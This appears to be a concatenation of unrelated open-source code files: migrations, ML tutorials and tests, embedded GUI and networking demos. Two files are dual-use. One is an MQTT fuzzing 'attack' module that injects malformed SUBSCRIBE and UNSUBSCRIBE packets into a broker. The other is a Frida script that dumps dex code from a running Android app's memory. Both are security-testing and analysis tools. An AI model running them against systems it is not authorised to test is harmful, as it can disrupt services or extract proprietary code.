field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="member_interfaces",
to="dcim.interface",
),
),
migrations.AddField(
model_name="interface",
name="tagged_vlans",
field=models.ManyToManyField(blank=True, related_name="interfaces_as_tagged", to="ipam.VLAN"),
),
migrations.AddField(
model_name="interface",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="interface",
name="untagged_vlan",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="interfaces_as_untagged",
to="ipam.vlan",
),
),
migrations.AddField(
model_name="frontporttemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontporttemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="frontporttemplate",
name="rear_port",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="frontport_templates",
to="dcim.rearporttemplate",
),
),
migrations.AddField(
model_name="frontport",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="frontport",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="frontport",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.device"
),
),
migrations.AddField(
model_name="frontport",
name="rear_port",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.rearport"
),
),
migrations.AddField(
model_name="frontport",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="devicetype",
name="manufacturer",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT, related_name="device_types", to="dcim.manufacturer"
),
),
migrations.AddField(
model_name="devicetype",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="devicebaytemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="devicebaytemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="devicebay",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="devicebays", to="dcim.device"
),
),
migrations.AddField(
model_name="devicebay",
name="installed_device",
field=models.OneToOneField(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="parent_bay",
to="dcim.device",
),
),
migrations.AddField(
model_name="devicebay",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
]
|
client/tests/test_proof.py
|
mithril-security/blindai
| 121 |
62033
|
from copy import deepcopy
from hashlib import sha256
import os
import unittest
from google.protobuf.timestamp_pb2 import Timestamp
from blindai.pb.securedexchange_pb2 import (
Payload,
)
from blindai.client import (
RunModelResponse,
UploadModelResponse,
)
from blindai.dcap_attestation import Policy
from blindai.utils.errors import SignatureError, AttestationError
from .covidnet import get_input, get_model
exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof")
exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof")
tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof")
policy_file = os.path.join(os.path.dirname(__file__), "policy.toml")
class TestProof(unittest.TestCase):
def test_parse_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
self.assertTrue(response.is_signed())
response2 = RunModelResponse()
with open(exec_run, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
self.assertEqual(response.output, response2.output)
response3 = RunModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
self.assertEqual(response.output, response3.output)
response3.save_to_file(tmp_path)
response4 = RunModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
self.assertEqual(response.output, response4.output)
def test_parse_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
self.assertTrue(response.is_signed())
response2 = UploadModelResponse()
with open(exec_upload, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
response3 = UploadModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
response3.save_to_file(tmp_path)
response4 = UploadModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
def test_validate_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
policy = Policy.from_file(policy_file)
response.validate(
get_input(),
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.run_model_payload.output[0] += 0.1
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Input validation
response2 = deepcopy(response)
data = deepcopy(get_input())
data[4] += 1
with self.assertRaises(SignatureError):
response2.validate(
data,
policy=policy,
)
# Using file
response.validate(
get_input(),
policy_file=policy_file,
)
def test_validate_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
policy = Policy.from_file(policy_file)
model_hash = sha256(get_model()).digest()
response.validate(
model_hash,
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.send_model_payload.model_hash = (
b"1" + payload.send_model_payload.model_hash[1:]
)
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Input validation
response2 = deepcopy(response)
new_hash = model_hash[:5] + b"1" + model_hash[6:]
with self.assertRaises(SignatureError):
response2.validate(
new_hash,
policy=policy,
)
# Using file
response.validate(
model_hash,
policy_file=policy_file,
)
|
problems/first-non-repeated-character/first-non-repeated-character-answer.py
|
lhayhurst/interview-with-python
| 201 |
62114
|
##$$## ---------- TAGS ----------- ##$$##
##$$## first,non,repeated,character
##$$## --------- ENDTAGS --------- ##$$##
###### - Write your answer below - ######
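# One possible sketch of an answer (illustrative only, not the repository's
# official solution): count the characters in a single pass, then return the
# first character whose count is exactly one.
from collections import Counter
def first_non_repeated_character(s):
    counts = Counter(s)
    for ch in s:
        if counts[ch] == 1:
            return ch
    return None
# Example: first_non_repeated_character("swiss") returns "w"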
|
momentumnet-main/examples/drop_in_replacement_tutorial.py
|
ZhuFanCheng/Thesis
| 188 |
62118
|
<reponame>ZhuFanCheng/Thesis
"""
======================================================
From ResNets to Momentum ResNets 1)
======================================================
This is a tutorial to use the transform_to_momentumnet
method:
<NAME>, <NAME>, <NAME>,
<NAME>. Momentum Residual Neural Networks.
Proceedings of the 38th International Conference
on Machine Learning, PMLR 139:9276-9287
""" # noqa
# Authors: <NAME>, <NAME>
# License: MIT
from torch import nn
from momentumnet import transform_to_momentumnet
####################################
# Let us define a toy Neural Network
####################################
class ResBlock(nn.Module):
def __init__(self, functions):
super(ResBlock, self).__init__()
self.functions = functions
def forward(self, x):
for f in self.functions:
x = x + f(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.res_layer1 = ResBlock(
nn.Sequential(
*[
nn.Sequential(
nn.Linear(2, 10), nn.Tanh(), nn.Linear(10, 2)
)
for _ in range(3)
]
)
)
self.l1 = nn.Linear(2, 4)
self.layer2 = nn.Sequential(
*[
nn.Sequential(nn.Linear(4, 100), nn.ReLU(), nn.Linear(100, 4))
for _ in range(4)
]
)
self.l2 = nn.Linear(4, 8)
self.fc = nn.Linear(8, 10)
def forward(self, x):
out = self.res_layer1(x) # Residual
out = self.l1(out)
out = self.layer2(out) # Not Residual but same dimensions
out = self.l2(out)
out = self.fc(out)
return out
net = Net()
###################################################
# We want to transform it into its Momentum version
###################################################
###############################################################################
# The first layer 'res_layer1' preserves dimensions and is residual.
# It can be accessed through net.res_layer1.functions, so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform this residual block into a momentum one as follows:
mnet1 = transform_to_momentumnet(
net,
["res_layer1.functions"], # attributes of the sublayers in net
gamma=0.9,
use_backprop=False,
is_residual=True,
keep_first_layer=False,
)
###############################################################################
# Note that layer2 is not residual but also preserves dimensions.
# It can be accessed through net.layer2, so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform it in the same way by setting is_residual to False.
mnet = transform_to_momentumnet(
mnet1,
["layer2"],
gamma=0.9,
use_backprop=False,
is_residual=False,
keep_first_layer=False,
)
###############################################################################
# net, mnet1, and mnet have the same parameters.
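###############################################################################
# A small sanity check (a sketch added for illustration, not part of the
# original tutorial): the transformed network keeps the interface of the
# original one, so a forward pass should work and produce an output of the
# same shape. The batch size below is arbitrary.
import torch
x = torch.randn(16, 2)
print(mnet(x).shape)  # expected: torch.Size([16, 10]), same as the original net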
|
macarico/tasks/cartpole.py
|
bgalbraith/macarico
| 121 |
62193
|
<gh_stars>100-1000
"""
Largely based on the OpenAI Gym Implementation
https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
"""
from __future__ import division, generators, print_function
import numpy as np
import macarico
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable as Var
class CartPoleEnv(macarico.Env):
def __init__(self):
macarico.Env.__init__(self, 2, 200)
self.gravity = 9.8
self.masscart = 1.0
self.masspole = 0.1
self.total_mass = (self.masspole + self.masscart)
self.length = 0.5 # actually half the pole's length
self.polemass_length = (self.masspole * self.length)
self.force_mag = 10.0
self.tau = 0.02 # seconds between state updates
# Angle at which to fail the episode
self.theta_threshold_radians = 12 * 2 * math.pi / 360
self.x_threshold = 2.4
# Angle limit set to 2 * theta_threshold_radians so failing observation
# is still within bounds
self.state = None
# For macarico.Env
self.actions = set(range(self.n_actions))
def _rewind(self):
self.state = torch.rand(4) * 0.1 - 0.05
self.steps_beyond_done = None
def _run_episode(self, policy):
for _ in range(self.horizon()):
a = policy(self)
if self.step(a):
break
return self._trajectory
def step(self, action):
state = self.state
x, x_dot, theta, theta_dot = state
force = self.force_mag if action == 1 else - self.force_mag
costheta = math.cos(theta)
sintheta = math.sin(theta)
temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass
thetaacc = (self.gravity * sintheta - costheta * temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))
xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass
x = x + self.tau * x_dot
x_dot = x_dot + self.tau * xacc
theta = theta + self.tau * theta_dot
theta_dot = theta_dot + self.tau * thetaacc
#self.state = (x, x_dot, theta, theta_dot)
self.state[0] = x
self.state[1] = x_dot
self.state[2] = theta
self.state[3] = theta_dot
done = x < -self.x_threshold \
or x > self.x_threshold \
or theta < -self.theta_threshold_radians \
or theta > self.theta_threshold_radians
return done
class CartPoleLoss(macarico.Loss):
def __init__(self):
super(CartPoleLoss, self).__init__('-t')
def evaluate(self, example):
return -len(example.Yhat)
#return (100 - state.t) / 100
class CartPoleFeatures(macarico.DynamicFeatures):
def __init__(self):
macarico.DynamicFeatures.__init__(self, 4)
def _forward(self, state):
return Var(state.state.view(1,1,-1), requires_grad=False)
|
tests/test_torchy.py
|
sagnik/baseline
| 241 |
62200
|
<reponame>sagnik/baseline
import pytest
import numpy as np
torch = pytest.importorskip('torch')
from baseline.utils import Offsets
from baseline.pytorch.torchy import SequenceCriterion
C = 10
B = 50
S = 20
@pytest.fixture
def lengths():
lengths = torch.randint(1, S, size=(B,)).long()
return lengths
@pytest.fixture
def logits(lengths):
logits = torch.rand(B, S, C)
for i, l in enumerate(lengths):
logits[i, l:, :] = 0
return logits
@pytest.fixture
def labels(lengths):
lab = torch.randint(1, C, size=(B, S)).long()
for i, l in enumerate(lengths):
lab[i, l:] = 0
return lab
def raw_loss(logits, labels, loss):
B, T, H = logits.size()
crit = loss(reduce=False, ignore_index=Offsets.PAD)
total_size = labels.nelement()
res = crit(logits.view(total_size, -1), labels.view(total_size))
return res.view(B, T)
def test_batch_sequence_loss(logits, labels):
loss = torch.nn.CrossEntropyLoss
raw = raw_loss(logits, labels, loss)
gold = torch.mean(torch.sum(raw, dim=1))
crit = SequenceCriterion(LossFn=loss, avg='batch')
res = crit(logits, labels)
np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
def test_token_sequence_loss(logits, labels, lengths):
loss = torch.nn.CrossEntropyLoss
raw = raw_loss(logits, labels, loss)
gold = torch.sum(raw) / torch.sum(lengths).to(logits.dtype)
crit = SequenceCriterion(LossFn=loss, avg='token')
res = crit(logits, labels)
np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
|
multimedia/gui/lvgl/lvgl_img.py
|
708yamaguchi/MaixPy_scripts
| 485 |
62208
|
<reponame>708yamaguchi/MaixPy_scripts<gh_stars>100-1000
import lvgl as lv
import lvgl_helper as lv_h
import lcd
import time
from machine import Timer
from machine import I2C
import touchscreen as ts
i2c = I2C(I2C.I2C0, freq=400000, scl=30, sda=31)
lcd.init()
ts.init(i2c)
lv.init()
disp_buf1 = lv.disp_buf_t()
buf1_1 = bytearray(320*10)
lv.disp_buf_init(disp_buf1,buf1_1, None, len(buf1_1)//4)
disp_drv = lv.disp_drv_t()
lv.disp_drv_init(disp_drv)
disp_drv.buffer = disp_buf1
disp_drv.flush_cb = lv_h.flush
disp_drv.hor_res = 320
disp_drv.ver_res = 240
lv.disp_drv_register(disp_drv)
indev_drv = lv.indev_drv_t()
lv.indev_drv_init(indev_drv)
indev_drv.type = lv.INDEV_TYPE.POINTER
indev_drv.read_cb = lv_h.read
lv.indev_drv_register(indev_drv)
# lv.log_register_print_cb(lv_h.log)
lv.log_register_print_cb(lambda level,path,line,msg: print('%s(%d): %s' % (path, line, msg)))
# Image data
with open('/flash/blue_flower_32.bin','rb') as f:
img_data = f.read()
# Pixel format: Fix 0xFF: 8 bit, Red: 8 bit, Green: 8 bit, Blue: 8 bit
# Create a screen with an image (dragging is disabled below)
scr = lv.obj()
img = lv.img(scr)
img.align(scr, lv.ALIGN.CENTER, 0, 0)
img_dsc = lv.img_dsc_t({
'header':{
'always_zero': 0,
'w':100,
'h':75,
'cf':lv.img.CF.TRUE_COLOR
},
'data_size': len(img_data),
'data': img_data
})
img.set_src(img_dsc)
img.set_drag(False)
# Load the screen and display image
lv.scr_load(scr)
def on_timer(timer):
lv.tick_inc(5)
timer = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PERIODIC, period=5, unit=Timer.UNIT_MS, callback=on_timer, arg=None)
while True:
tim = time.ticks_ms()
lv.task_handler()
while time.ticks_ms()-tim < 5:
pass
|
script/dumpdex.py
|
4ch12dy/xadb
| 326 |
62220
|
<filename>script/dumpdex.py
import json
import os
import sys
import frida
import time
import re
if len(sys.argv) <= 1:
print("[Dumpdex]: you should pass pid/packageName")
exit()
device = frida.get_usb_device()
pkg_name = device.get_frontmost_application().identifier
# check is package or pid
pattern = re.compile(r'^\d+$', re.I)
m = pattern.match(sys.argv[1])
if m:
app_pid = sys.argv[1]
print("[Dumpdex]: you specail the pid:" + app_pid)
# if customize the pid, use this pid. Such as app has mutiple pid
if ('app_pid' in locals() or 'app_pid' in globals()) and app_pid:
session = device.attach(int(app_pid))
else:
session = device.attach(pkg_name)
else:
pkg_name = sys.argv[1]
print("[Dumpdex]: you specail the package name:" + pkg_name + ", so spawn it and sleep 50s for launch completely")
pid = device.spawn(pkg_name)
time.sleep(50);
session = device.attach(pid)
script = session.create_script(open(open(os.path.expanduser("~/.xadb/rootdir")).read().strip() + "/script/agent.js").read())
script.load()
matches = script.exports.scandex()
for dex in matches:
bs = script.exports.memorydump(dex['addr'], dex['size'])
if not os.path.exists("./" + pkg_name + "/"):
os.mkdir("./" + pkg_name + "/")
open(pkg_name + "/" + dex['addr'] + ".dex", 'wb').write(bs)
print("[Dumpdex]: DexSize=" + hex(dex['size']) + ", SavePath=./" + pkg_name + "/" + dex['addr'] + ".dex")
|
recipes/Python/576735_How_to_use_twisted_pb_FilePager/recipe-576735.py
|
tdiprima/code
| 2,023 |
62224
|
<reponame>tdiprima/code
from twisted.spread.util import FilePager
from twisted.spread.flavors import Referenceable
from twisted.internet.defer import Deferred
import os
PATH = r"C:\temp\very_large_file.exe"
### Server Side
class ResultsPager(FilePager):
def __init__(self, collector, path):
self._deferred = Deferred()
print "%s, %d bytes" % (path, os.path.getsize(path))
fd = file(path, 'rb')
FilePager.__init__(self, collector, fd, callback=self.done)
def done(self):
print "The entire file has been transferred."
self._deferred.callback(self.collector)
def wait(self):
return self._deferred
class FilePagerizer(Referenceable):
def remote_getFile(self, collector, path):
pager = ResultsPager(collector, path)
return pager.wait()
### Client Side
class SimplePageCollector(Referenceable):
def __init__(self):
self.pages = []
def remote_gotPage(self, page):
self.pages.append(page)
print "gotPage (%d bytes)" % len(page)
def remote_endedPaging(self):
print 'endedPaging'
class FilerGetter:
def __init__(self, p):
self._file_pagerizer = p
def getRemoteFile(self, path):
root, ext = os.path.splitext(os.path.basename(path))
local_path = root + '-new' + ext
return self._file_pagerizer.callRemote(
"getFile",
SimplePageCollector(), path).addCallback(self._finished, local_path)
def _finished(self, collector, path):
data = ''.join(collector.pages)
with file(path, 'wb') as f:
f.write(data)
print "write to %s, %d bytes" % (path, len(data))
if __name__ == '__main__':
import sys
from twisted.internet import reactor
from twisted.python import log
log.startLogging(sys.stdout)
PORTNO = 8123
if sys.argv[1] == 'server':
from twisted.spread.flavors import Root
from twisted.spread.pb import PBServerFactory
class SimpleRoot(Root):
def rootObject(self, broker):
return FilePagerizer()
reactor.listenTCP(PORTNO, PBServerFactory(SimpleRoot()))
elif sys.argv[1] == 'client':
from twisted.spread import pb
def getFile1(x, path):
r = FilerGetter(x)
return r.getRemoteFile(path)
from twisted.spread import util
def getFile2(x, path):
def finished(pages):
data = ''.join(pages)
root, ext = os.path.splitext(os.path.basename(path))
local_path = root + '-new' + ext
f = file(local_path, 'wb')
f.write(data)
print "%d bytes written to %s" % (len(data), local_path)
util.getAllPages(x, "getFile", path).addCallback(finished)
cf = pb.PBClientFactory()
reactor.connectTCP("localhost", PORTNO, cf)
cf.getRootObject().addCallback(getFile2, PATH)
else:
raise sys.exit("usage: %s (server|client)" % sys.argv[0])
reactor.run()
|
RecoPixelVertexing/PixelLowPtUtilities/python/StripSubClusterShapeSeedFilter_cfi.py
|
ckamtsikis/cmssw
| 852 |
62267
|
<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from RecoPixelVertexing.PixelLowPtUtilities.StripSubClusterShapeFilter_cfi import StripSubClusterShapeFilterParams
StripSubClusterShapeSeedFilter = cms.PSet(
StripSubClusterShapeFilterParams,
ComponentName = cms.string('StripSubClusterShapeSeedFilter'),
FilterAtHelixStage = cms.bool(False),
label = cms.untracked.string("Seeds"),
)
|
src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py
|
QWERTSKIHACK/peniot
| 143 |
62346
|
<filename>src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py
import multiprocessing
import unittest
import paho.mqtt.client as paho
import logging
import random
import signal
import struct
import time
from Entity.attack import Attack
from Entity.input_format import InputFormat
from Utils.RandomUtil import random_generated_names
class MQTTGenerationBasedFuzzingAttack(Attack):
"""
    MQTT Protocol - Generation Based Fuzzing Attack module
    It is created to test any MQTT device as a black-box test with malformed or semi-malformed inputs
"""
client = None
# Input Fields
address = None
# Misc Members
sent_message_count = 0 # Transmitted fuzzing packets
logger = None
stopped_flag = False
subscribe = paho.SUBSCRIBE
unsubscribe = paho.UNSUBSCRIBE
def __init__(self):
default_parameters = ["127.0.0.1"]
inputs = [
InputFormat("Broker Address", "address", "", str, mandatory=True)
]
Attack.__init__(self, "MQTT Generation Based Fuzzing Attack", inputs, default_parameters,
" Inject the packets which are created from the scratch\n"
" and changed by come of their bits to corrupt the content")
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s:%(levelname)s:%(name)s:%(message)s")
# Signal handler to exit from function
signal.signal(signal.SIGINT, self.signal_handler)
def signal_handler(self, sig, frame):
self.stop_attack()
def stop_attack(self):
self.logger.info("Transmitted fuzzing packet count: {0}, exitting...".format(self.sent_message_count))
self.stopped_flag = True
if (self.client is not None):
self.client.disconnect() # Close the connection before exitting
time.sleep(2) # Sleep two seconds so the user can see the message
# sys.exit(0)
def pre_attack_init(self):
self.client = paho.Client(random_generated_names.get_random_client_name())
try:
self.client.connect(self.address)
except Exception as e:
self.logger.error("Failed to connect to broker")
def send_subscribe_or_unsubscribe(self, fuzz_client, message_type, topics, dup=False, optional_remaining_length=2,
command_dup_shift_times=3, command_base_xor_part=0x2):
"""
Generic subscribe and unsubscribe packet injection functionality
:param fuzz_client: Client ot be fuzzed
:param message_type: Currently either SUBSCRIBE or UNSUBSCRIBE
:param topics: Topics in form [("my/topic", 0), ("another/topic", 2)] for SUBSCRIBE
or ["my/topic",another/topic"] for UNSUBSCRIBE
:param dup: Duplicate flag, I set it FALSE, but you can test with TRUE
:param optional_remaining_length: To exploit message content, normally MQTT header length
for SUBSCRIBE and UNSUBSCRIBE is 2 bytes
:param command_dup_shift_times: Aligning command in header, change this to create malformed messages
:param command_base_xor_part: Normally, we need to perform XOR with 0x2 to command part of MQTT Control Packet
field of the header
:type fuzz_client: mqtt.Client
:return: Tuple of queued message and local mid
"""
remaining_length = optional_remaining_length
for t in topics:
remaining_length += optional_remaining_length + len(t)
command = message_type | (dup << command_dup_shift_times) | command_base_xor_part
packet = bytearray()
packet.append(command)
fuzz_client._pack_remaining_length(packet, remaining_length)
local_mid = fuzz_client._mid_generate()
packet.extend(struct.pack("!H", local_mid))
if message_type == self.subscribe:
for t, q in topics:
fuzz_client._pack_str16(packet, t)
packet.append(q)
elif message_type == self.unsubscribe:
for t in topics:
fuzz_client._pack_str16(packet, t)
else:
self.logger.info("Unknown message type in Generation Based Fuzzing")
return (fuzz_client._packet_queue(command, packet, local_mid, 1), local_mid)
def random_topic_generator(self, message_type, possible_characters, possible_qos_values, length=10):
try:
assert length > 2
where_to_put_slash = random.randint(1, length - 1)
topic = "{0}/{1}".format(
"".join([random.choice(possible_characters) for _ in range(1, where_to_put_slash)]),
"".join([random.choice(possible_characters) for _ in range(where_to_put_slash, length)]))
if message_type == self.subscribe:
return topic, random.choice(possible_qos_values)
elif message_type == self.unsubscribe:
return topic
else:
self.logger.info("Unknown message type in Generation Based Fuzzing")
except AssertionError:
self.logger.error("Length must be greater than 2")
return "random/topic"
def run(self):
Attack.run(self)
self.pre_attack_init()
subscribe = paho.SUBSCRIBE
unsubscribe = paho.UNSUBSCRIBE
# Quality of service creator
random_qosses = [0, 1, 2]
# Currently include "A...Za...z"
random_strings = "".join([chr(_) for _ in range(65, 91)]) + "".join([chr(_) for _ in range(97, 123)])
'''
(fuzz_client, message_type, topics, dup=False, optional_remaining_length=2,
command_dup_shift_times=3, command_base_xor_part=0x2):
'''
test_cases = [
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses),
self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses),
self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5)
]
for test_case in test_cases:
if self.stopped_flag is True:
break
self.send_subscribe_or_unsubscribe(
self.client, test_case["message_type"], test_case["topics"],
test_case["dup"], test_case["optional_remaining_length"],
test_case["command_dup_shift_times"], test_case["command_base_xor_part"]
)
# Increment sent message count
self.sent_message_count += 1
self.logger.info("Test case {0} has been run in generation based fuzzing".format(str(test_case)))
time.sleep(1)
class TestMQTTGenerationBasedFuzzingAttack(unittest.TestCase):
def setUp(self):
self.mqtt_generation_based_fuzzer = MQTTGenerationBasedFuzzingAttack()
def tearDown(self):
pass
def test_name(self):
self.assertEqual("MQTT Generation Based Fuzzing Attack", self.mqtt_generation_based_fuzzer.get_attack_name())
def test_inputs(self):
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
self.assertIsNotNone(inputs)
self.assertGreater(len(inputs), 0, "Non inserted inputs")
self.assertEquals(len(inputs), 1)
def test_non_initialized_inputs(self):
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
for _input in inputs:
value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name())
self.assertTrue(value is None or type(value) == _input.get_type())
def test_after_getting_inputs(self):
example_inputs = ["a.b.c.d"]
for index, _input in enumerate(example_inputs):
self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input)
# Previously it should not be set
self.assertIsNone(self.mqtt_generation_based_fuzzer.client)
super(MQTTGenerationBasedFuzzingAttack, self.mqtt_generation_based_fuzzer).run()
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
for index, _input in enumerate(inputs):
value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name())
self.assertEqual(example_inputs[index], value)
def testGenerationBasedFuzzingAttack(self):
def run_attack():
example_inputs = ["127.0.0.1"]
for index, _input in enumerate(example_inputs):
self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input)
try:
self.mqtt_generation_based_fuzzer.run()
except Exception as e:
self.assertTrue(False)
print "* If server is not initialized this test will not execute properly."
p = multiprocessing.Process(target=run_attack, name="Generation Based Fuzzing Attack")
p.start()
time.sleep(10)
if p.is_alive():
p.terminate()
p.join()
if __name__ == '__main__':
unittest.main()
|
tests/chainer_tests/functions_tests/normalization_tests/test_layer_normalization.py
|
zaltoprofen/chainer
| 3,705 |
62351
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*(testing.product({
'batchsize': [1, 5],
'size': [10, 20],
'dtype': [numpy.float32],
'eps': [1e-5, 1e-1],
})))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ [
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
]
)
class TestLayerNormalization(testing.FunctionTestCase):
def setUp(self):
self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
def generate_inputs(self):
shape = self.batchsize, self.size
size = numpy.prod(shape) // shape[0]
x = numpy.random.uniform(-1, 1, shape).astype(self.dtype)
gamma = numpy.random.uniform(-1, 1, size).astype(self.dtype)
beta = numpy.random.uniform(-1, 1, size).astype(self.dtype)
return x, gamma, beta
def forward_expected(self, inputs):
x, gamma, beta = inputs
mean = numpy.mean(x, axis=1, keepdims=True)
var = numpy.mean(numpy.square(x - mean), axis=1, keepdims=True)
std = numpy.sqrt(var + self.eps)
y_expected = (
numpy.expand_dims(gamma, axis=0) * (x - mean) / std
+ numpy.expand_dims(beta, axis=0))
return y_expected,
def forward(self, inputs, device):
x, gamma, beta = inputs
